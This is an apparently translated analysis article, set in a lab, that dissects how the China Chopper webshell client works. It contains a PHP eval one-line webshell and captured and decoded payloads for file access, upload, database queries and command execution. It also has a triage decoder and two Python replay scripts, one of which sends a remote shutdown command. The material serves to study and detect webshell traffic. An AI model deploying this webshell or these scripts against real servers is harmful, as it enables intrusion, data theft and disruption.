Environment:
1. xp1: 192.168.110.132 (victim)
PHPnow 1.5.6
Wireshark 1.12.0
2. xp2: 192.168.110.129 (attacker)
China Chopper 20100812
3. Kali: 192.168.110.128
Python 2.7.3
Procedure:
First, in the web directory on xp1 we write the one-line shell <?php eval($_POST['wood']);?> and save it as 1.php.
Then we connect to it with Chopper and configure the database management settings.
0x01 Directory management
Capturing packets on xp1 gives the following:
POST /1.php HTTP/1.1
X-Forwarded-For: 199.1.88.29
Referer: http://192.168.110.132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Host: 192.168.110.132
Content-Length: 744
Cache-Control: no-cache
wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XFxodGRvY3NcXA%3D%3D
The body is clearly URL-encoded and base64-encoded. Decoding it gives the following:
wood=@eval(base64_decode($_POST[z0]));
&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");; // disable error display, remove the execution time limit, turn off magic quotes
$D=base64_decode($_POST["z1"]);
$F=@opendir($D);
if($F==NULL)
{
    echo("ERROR:// Path Not Found Or No Permission!");
}
else
{
    $M=NULL;$L=NULL;
    while($N=@readdir($F))
    {
        $P=$D."/".$N;
        $T=@date("Y-m-d H:i:s",@filemtime($P));
        @$E=substr(base_convert(@fileperms($P),10,8),-4);
        $R="\t".$T."\t".@filesize($P)."\t".$E."\n";
        if(@is_dir($P))
            $M.=$N."/".$R;
        else
            $L.=$N.$R;
    }
    echo $M.$L;
    @closedir($F);
};
echo("|<-");
die();
&z1=C:\\PHPnow-1.5.6.4237493736\\htdocs\\
0x02 File download
We download 1.txt from xp1; its content is test.
Captured packet:
POST /1.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.110.132
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Host: 192.168.110.132
Content-Length: 472
Cache-Control: no-cache
wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1nZXRfbWFnaWNfcXVvdGVzX2dwYygpP3N0cmlwc2xhc2hlcygkX1BPU1RbInoxIl0pOiRfUE9TVFsiejEiXTskZnA9QGZvcGVuKCRGLCJyIik7aWYoQGZnZXRjKCRmcCkpe0BmY2xvc2UoJGZwKTtAcmVhZGZpbGUoJEYpO31lbHNle2VjaG8oIkVSUk9SOi8vIENhbiBOb3QgUmVhZCIpO307ZWNobygifDwtIik7ZGllKCk7&z1=C%3A%5C%5CPHPnow-1.5.6.4237493736%5C%5Chtdocs%5C%5C1.txt
Decoding it the same way gives:
wood=@eval(base64_decode($_POST[z0]));
&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];
$fp=@fopen($F,"r");
if(@fgetc($fp))
{
    @fclose($fp);@readfile($F);
}
else
{
    echo("ERROR:// Can Not Read");
};
echo("|<-");die();
&z1=C:\\PHPnow-1.5.6.4237493736\\htdocs\\1.txt
0x03 File upload
We upload an image named 1.png from xp2 to xp1.
The captured packet is as follows:
POST /1.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.110.132
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Host: 192.168.110.132
Content-Length: 210271
Cache-Control: no-cache
&wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik%2FIjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=QzpcXFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XFxodGRvY3NcXDEucG5n&z...
Decoded:
&wood=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
$f=base64_decode($_POST["z1"]);
$c=$_POST["z2"];
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=2)
    $buf.=urldecode("%".substr($c,$i,2));
echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;
echo("|<-");die();
&z1=C:\\PHPnow-1.5.6.4237493736\\htdocs\\1.png
0x04 Database management
Database: dvwa, account: root, password: toor
Executed: SHOW TABLES FROM `dvwa`
Captured packet:
POST /1.php HTTP/1.1
X-Forwarded-For: 199.1.88.29
Referer: http://192.168.110.132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Host: 192.168.110.132
Content-Length: 741
Cache-Control: no-cache
wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTskcT1AbXlzcWxfcXVlcnkoIlNIT1cgVEFCTEVTIEZST00gYHskZGJufWAiKTt3aGlsZSgkcnM9QG15c3FsX2ZldGNoX3JvdygkcSkpe2VjaG8odHJpbSgkcnNbMF0pLmNocig5KSk7fUBteXNxbF9jbG9zZSgkVCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=localhost&z2=root&z3=toor&z4=dvwa
Decoded:
wood=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
$m=get_magic_quotes_gpc();$hst=$m?stripslashes($_POST["z1"]):$_POST["z1"];
$usr=$m?stripslashes($_POST["z2"]):$_POST["z2"];
$pwd=$m?stripslashes($_POST["z3"]):$_POST["z3"];
$dbn=$m?stripslashes($_POST["z4"]):$_POST["z4"];
$T=@mysql_connect($hst,$usr,$pwd);
$q=@mysql_query("SHOW TABLES FROM `{$dbn}`");
while($rs=@mysql_fetch_row($q))
{
    echo(trim($rs[0]).chr(9));
}
@mysql_close($T);;echo("|<-");
die();
&z1=localhost&z2=root&z3=toor&z4=dvwa
Executed: SELECT * FROM `users` ORDER BY 1 DESC LIMIT 0,20
POST /1.php HTTP/1.1
X-Forwarded-For: 199.1.88.29
Referer: http://192.168.110.132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Host: 192.168.110.132
Content-Length: 866
Cache-Control: no-cache
wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyR0YWI9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejUiXSk6JF9QT1NUWyJ6NSJdOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTtAbXlzcWxfc2VsZWN0X2RiKCRkYm4pOyRxPUBteXNxbF9xdWVyeSgiU0hPVyBDT0xVTU5TIEZST00gYHskdGFifWAiKTt3aGlsZSgkcnM9QG15c3FsX2ZldGNoX3JvdygkcSkpe2VjaG8odHJpbSgkcnNbMF0pLiIgKCIuJHJzWzFdLiIpIi5jaHIoOSkpO31AbXlzcWxfY2xvc2UoJFQpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=localhost&z2=root&z3=toor&z4=dvwa&z5=users
Decoded:
wood=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
$m=get_magic_quotes_gpc();$hst=$m?stripslashes($_POST["z1"]):$_POST["z1"];
$usr=$m?stripslashes($_POST["z2"]):$_POST["z2"];
$pwd=$m?stripslashes($_POST["z3"]):$_POST["z3"];
$dbn=$m?stripslashes($_POST["z4"]):$_POST["z4"];
$tab=$m?stripslashes($_POST["z5"]):$_POST["z5"];
$T=@mysql_connect($hst,$usr,$pwd);
@mysql_select_db($dbn);$q=@mysql_query("SHOW COLUMNS FROM `{$tab}`");
while($rs=@mysql_fetch_row($q)){echo(trim($rs[0])." (".$rs[1].")".chr(9));}@mysql_close($T);;
echo("|<-");
die();
&z1=localhost&z2=root&z3=toor&z4=dvwa&z5=users
Executed: SELECT `user` FROM `users` ORDER BY 1 DESC LIMIT 0,10
POST /1.php HTTP/1.1
X-Forwarded-For: 199.1.88.29
Referer: http://192.168.110.132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Host: 192.168.110.132
Content-Length: 1027
Cache-Control: no-cache
wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRzcWw9YmFzZTY0X2RlY29kZSgkX1BPU1RbIno1Il0pOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTtAbXlzcWxfc2VsZWN0X2RiKCRkYm4pOyRxPUBteXNxbF9xdWVyeSgkc3FsKTskaT0wO3doaWxlKCRjb2w9QG15c3FsX2ZpZWxkX25hbWUoJHEsJGkpKXtlY2hvKCRjb2wuIlx0fFx0Iik7JGkrKzt9ZWNobygiXHJcbiIpO3doaWxlKCRycz1AbXlzcWxfZmV0Y2hfcm93KCRxKSl7Zm9yKCRjPTA7JGM8JGk7JGMrKyl7ZWNobyh0cmltKCRyc1skY10pKTtlY2hvKCJcdHxcdCIpO31lY2hvKCJcclxuIik7fUBteXNxbF9jbG9zZSgkVCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=localhost&z2=root&z3=toor&z4=dvwa&z5=U0VMRUNUIGB1c2VyYCBGUk9NIGB1c2Vyc2AgT1JERVIgQlkgMSBERVNDIExJTUlUIDAsMTA%3D
Decoded:
wood=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
$m=get_magic_quotes_gpc();
$hst=$m?stripslashes($_POST["z1"]):$_POST["z1"];
$usr=$m?stripslashes($_POST["z2"]):$_POST["z2"];
$pwd=$m?stripslashes($_POST["z3"]):$_POST["z3"];
$dbn=$m?stripslashes($_POST["z4"]):$_POST["z4"];
$sql=base64_decode($_POST["z5"]);
$T=@mysql_connect($hst,$usr,$pwd);
@mysql_select_db($dbn);
$q=@mysql_query($sql);
$i=0;
while($col=@mysql_field_name($q,$i))
{
    echo($col."\t|\t");
    $i++;
}
echo("\r\n");
while($rs=@mysql_fetch_row($q))
{
    for($c=0;$c<$i;$c++)
    {
        echo(trim($rs[$c]));
        echo("\t|\t");
    }
    echo("\r\n");
}
@mysql_close($T);;
echo("|<-");die();
&z1=localhost&z2=root&z3=toor&z4=dvwa&z5=SELECT `user` FROM `users` ORDER BY 1 DESC LIMIT 0,10
0x05 Virtual terminal
In Chopper's virtual terminal we run: whoami
Captured packet:
POST /1.php HTTP/1.1
X-Forwarded-For: 199.1.88.29
Referer: http://192.168.110.132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Host: 192.168.110.132
Content-Length: 550
Cache-Control: no-cache
wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyAneyRzfSciOiIvYyB7JHN9Ijskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XGh0ZG9jc1wiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D
Decoded:
wood=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
$p=base64_decode($_POST["z1"]);
$s=base64_decode($_POST["z2"]);
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$c=substr($d,0,1)=="/"?"-c '{$s}'":"/c {$s}";
$r="{$p} {$c}";
@system($r." 2>&1");;
echo("|<-");
die();
&z1=cmd&z2=cd /d "C:\PHPnow-1.5.6.4237493736\htdocs\"&whoami&echo [S]&cd&echo [E]
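The manual URL-decoding and base64-decoding done in the sections above can be scripted when triaging captured traffic. The following Python 3 code is an added example, not part of the original article: it takes the request body captured in 0x05, recovers the PHP carried in z0, decodes only the arguments that the PHP itself passes through base64_decode, and labels the request by the PHP call it contains. The names BODY, ACTIONS, b64 and triage are made up for this example.

```python
import base64
import re
from urllib.parse import unquote

# Request body captured in section 0x05 of this article (whoami in the virtual terminal).
BODY = (
    "wood=@eval(base64_decode($_POST[z0]));&z0="
    "QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2lj"
    "X3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEi"
    "XSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQ"
    "VF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyAneyRzfSciOiIvYyB7JHN9Ijsk"
    "cj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D"
    "&z1=Y21k&z2=Y2QgL2QgIkM6XFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XGh0ZG9jc1wiJndob2FtaSZl"
    "Y2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D"
)

# PHP calls seen in the decoded payloads of sections 0x01-0x05, mapped to a label.
ACTIONS = [("system(", "command execution"), ("mysql_query(", "database query"),
           ("fwrite(", "file upload"), ("readfile(", "file download"),
           ("opendir(", "directory listing")]

def b64(value):
    """Base64-decode a form value, padding it if the capture lost trailing '='."""
    return base64.b64decode(value + "=" * (-len(value) % 4)).decode("latin-1")

def triage(body):
    """Decode one captured POST body; return None if it is not a Chopper request."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[key] = unquote(value)  # unquote keeps '+', which base64 needs
    # The shell's password field (here "wood") always carries the same stager.
    stager = [k for k, v in fields.items() if "eval(base64_decode($_POST[z0]))" in v]
    if not stager or "z0" not in fields:
        return None
    php = b64(fields["z0"])
    # The payload itself names the arguments it base64-decodes; decode only those.
    encoded = set(re.findall(r'base64_decode\(\$_POST\["(z\d+)"\]\)', php))
    args = {k: b64(v) if k in encoded else v
            for k, v in fields.items() if re.fullmatch(r"z[1-9]\d*", k)}
    action = next((label for call, label in ACTIONS if call in php), "unknown")
    return {"password_field": stager[0], "action": action, "php": php, "args": args}

if __name__ == "__main__":
    result = triage(BODY)
    print(result["action"], result["args"])
```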
Analysis
From the information above we can see that Chopper performs its operations by sending base64-encoded PHP commands,
so we can naturally emulate Chopper's functionality. Below I implement this with two Python scripts.
dir.py:
import urllib

# Replays the directory-listing request from section 0x01 (Python 2).
params = urllib.urlencode({
    "wood": "@eval(base64_decode($_POST[z0]));",
    "z0": ("QGlua"
           "V9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b"
           "3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7J"
           "EY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPc"
           "iBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkR"
           "ikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c"
           "3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiL"
           "kBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlI"
           "CRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7"),
    "z1": "QzpcXFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XFxodGRvY3NcXA==",
})
f = urllib.urlopen("http://192.168.110.132/1.php", params)
print f.read()
shutdown.py:
import urllib

params = urllib.urlencode({
    "wood": "@eval(base64_decode($_POST[z0]));",
    "z0": "ZWNobyBgc2h1dGRvd24gLXMgLXQgMGA7",
})
f = urllib.urlopen("http://192.168.110.132/1.php", params)
f.read()
This article was first published on the WeChat official account (T00ls): A Powerful Tool - An Analysis of How Chopper Works